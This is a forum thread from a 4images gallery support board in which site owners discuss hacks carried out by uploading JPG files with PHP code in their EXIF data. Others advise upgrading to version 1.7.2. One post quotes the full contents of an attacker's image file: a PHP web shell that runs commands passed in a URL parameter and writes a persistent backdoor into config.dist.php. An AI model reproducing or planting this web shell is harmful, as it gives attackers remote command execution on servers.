site got hacked.

[BartAfterDark]

My friends site got hacked. Everything is lost due to this bug

Code: [Select]

this exploit uploads a .jpg file with maliciuos EXIF metadata comptempt,
   it will be evaluated as php code:
We tried to save his pictures but it was to late We removed all files exept the data folder and installed 1.7.2. But someone 40 min ago a new file got into the data folder. A PHP script that has somehow to do with mysql.

I told him to pull the site down before he loses the user database

[V@no]

what file? in v1.7.2 the exploit with malicous EXIF metadata was fixed, these "images" still can be uploaded to the site, because they are images, but they are not a threat through that exploit.

[RuthE]

I've been hacked twice now. Almost exactly one month apart. Both were scripts uploaded to the gallery with .jpg extensions that pulled the ftp password for the site. After which they went in and deleted essential files and put up their hack page. Is there defense against this aside from not allowing people to upload images?

[Fastian]

Sounds scary to me
Can this effect on v1.7.1 ??

[RuthE]

I am running 1.7.1

[V@no]

Always pay attention to any bug fixes and always keep your software up-to-date - that way you will have less chances to get hacked again

[RuthE]

Which updates or security fix prevents someone from uploading a jpg that is a script?

[BartAfterDark]

well someone is still trying to upload some images that has php code in them
kkt.jpg

Code: [Select]

ÿØÿþ
?<?php
ob_clean();
echo"Hi Master!";
ini_set("max_execution_time",0);
passthru($_GET["cmd"]);
$in="<?php ob_clean();echo\"Hi Master!\";ini_set(\"max_execution_time\",0);passthru(\$_GET[\"cmd\"]);die;?>";
$sun=fopen("config.dist.php","w");
fputs($sun,$in);
fclose($sun);
chmod("config.dist.php",777);
die;
?>ÿà JFIF


H H  ÿÛ C































































ÿÛ C
































































ÿÀ 


 

ÿÄ 
                ÿÄ 
                ÿÄ 

               ÿÄ 
                ÿÚ 
 ? ?ÁÇßÿÙ
I don't hope this can do any damage now after I installed 1.7.2 on his server (with mods)

[IcEcReaM]

then nothing should happen,
cause there is no way to include this malicious script

[BartAfterDark]

I hope will install all the patches if they use 1.7.1. I don't want this to happen to anyone.
And the most stupid thing is, that it is soo easy to find a "how to" on this subject, cause some stupid french public site thinks it's fun to post exploits to the public

[Fastian]

I think I have all bug fixes installed on my v 1.7.1

But will someone direct me if there is a particular fix for this problem?
(Just to be on safe side)

[kai]

Which updates or security fix prevents someone from uploading a jpg that is a script?

Apply the security fixes listed here:
http://www.4homepages.de/forum/index.php?board=17.0

or update to the current version 4images 1.7.2

[V@no]

Which updates or security fix prevents someone from uploading a jpg that is a script?

Bug fixes are ment to fix the software, you should always apply ALL the bug fixes or dont complain if something goes wrong

And the most stupid thing is, that it is soo easy to find a "how to" on this subject, cause some stupid french public site thinks it's fun to post exploits to the public

Not only french sites...

[RuthE]

So, if you upgrade to 1.7.2 you don't have to do the three bug fixes? Am I understanding this correctly?

[V@no]

correct